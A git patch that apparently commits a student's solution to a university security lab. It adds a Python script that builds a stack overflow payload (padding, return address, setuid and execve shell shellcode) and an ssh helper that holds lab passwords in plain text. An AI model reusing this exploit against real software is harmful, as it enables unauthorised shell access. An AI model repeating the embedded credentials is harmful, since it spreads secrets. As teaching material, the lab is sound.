From 62aac5ca7c8cbfb392f0a479dc5bbed4c57b7451 Mon Sep 17 00:00:00 2001
From: Recolic Keghart <root@recolic.net>
Date: Fri, 8 Feb 2019 20:52:36 -0800
Subject: [PATCH] p1 done

---
 proj1/explain.md | 44 +++++++++++++++++++++++++++++++++++++++++++-
 proj1/ssh.sh     | 11 ++++++++---
 2 files changed, 51 insertions(+), 4 deletions(-)

diff --git a/proj1/explain.md b/proj1/explain.md
index 349d07a..2d094ab 100644
--- a/proj1/explain.md
+++ b/proj1/explain.md
@@ -1,4 +1,4 @@
-# 1
+## 1
 
 The makefile is interesting and I think the professor tried his best to
 make the program unsafe.
@@ -56,3 +56,45 @@ You have to let it all go. Fear, doubt, and disbelief. Free your mind.
 Next username: smith
 Next password: 37ZFBrAPm8
 ```
+
+My code is attached below
+```
+############# egg3
+#!/usr/bin/python3
+
+def fuck8(txt):
+    assert(len(txt) == 8)
+    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
+
+def revert(txt):
+    assert(len(txt) % 8 == 0)
+    res = ""
+    for i in range(int(len(txt) / 8)):
+        res += fuck8(txt[i*8:(i+1)*8])
+    return res
+
+
+fill = "0123456789abcdef0123456789abcdef01234567"
+#cs161-ace# raddr = "bffffa40"
+#cs161-atw# raddr = "bffffad0"
+raddr = "bffffad0"
+#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
+shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"
+########################################################################################### <- append an endline (0x0a, \n)
+
+payload = revert(fill) + revert(raddr) + (shellcode)
+print(payload)
+
+import binascii
+
+b = binascii.unhexlify(payload)
+with open('input.txt','wb+') as f:
+    f.write(b)
+############# egg
+#!/bin/bash
+
+./egg3 > /dev/null
+cat input.txt # | invoke dejavu
+```
+
+## 2
diff --git a/proj1/ssh.sh b/proj1/ssh.sh
index 8eb87e9..5254c96 100755
--- a/proj1/ssh.sh
+++ b/proj1/ssh.sh
@@ -1,4 +1,9 @@
 #!/bin/sh
-#echo 'Use password r4e8kWpeFC'
-#ssh vsftpd@localhost -p 16161
-sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  vsftpd@localhost -p 16161
+if [[ $1 == remote ]]; then
+    echo 'Connecting ucb cs161 autograde machine...'
+    u=atw
+    ssh -t cs161-$u@hive$((36#${u:2}%26+1)).cs.berkeley.edu \~cs161/proj1/start
+else
+    echo 'Connecting localhost...'
+    sshpass -p r4e8kWpeFC ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no  vsftpd@localhost -p 16161
+fi
-- 
GitLab